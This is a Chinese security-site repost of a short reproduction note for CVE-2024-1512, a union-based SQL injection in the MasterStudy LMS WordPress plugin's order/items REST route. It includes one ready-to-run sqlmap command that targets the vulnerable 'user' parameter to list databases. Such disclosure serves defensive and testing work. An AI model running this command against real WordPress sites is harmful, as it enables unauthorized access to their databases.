CVE-2024-1512

2024年5月6日07:33:01评论15 views字数 419阅读1分23秒阅读模式

漏洞描述

WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。WordPress Plugin MasterStudy LMS WordPress Plugin 3.2.5 版本及之前版本存在安全漏洞，该漏洞源于对用户提供的参数转义不足，导致可以通过/lms/stm-lms/order/items REST路由的 user参数进行基于联合的SQL注入。

资产测绘

FOFA：

漏洞复现

sqlmap -u 'http://example.com/?rest_route=/lms/stm-lms/order/items&author_id=111&user=555' --dbs --batch -p user

原文始发于微信公众号（漏洞文库）：【漏洞复现】CVE-2024-1512

左青龙
微信扫一扫

右白虎
微信扫一扫

本文由 admin 发表于 2024年5月6日07:33:01
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
CVE-2024-1512https://cn-sec.com/archives/2710131.html

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码

CVE-2024-1512

漏洞描述

漏洞复现

某ERP系统RCE漏洞（附EXP）

金盘图书馆微信管理后台信息泄露漏洞

用友畅捷通T+ Upload.aspx 任意文件上传漏洞

漏洞预警 | Apache Superset服务器端请求伪造漏洞

漏洞预警 | Google Android Framework权限提升漏洞

漏洞预警 | Apple ImageIO远程代码执行漏洞

QQ 逻辑漏洞可执行文件漏洞复现

Spring Cloud Function SpEL 远程代码执行漏洞（CVE-2022-22963）

【漏洞情报】Redis SORT_RO命令可绕过 ACL 配置

禅道RCE漏洞（附EXP）

发表评论

在线咨询

微信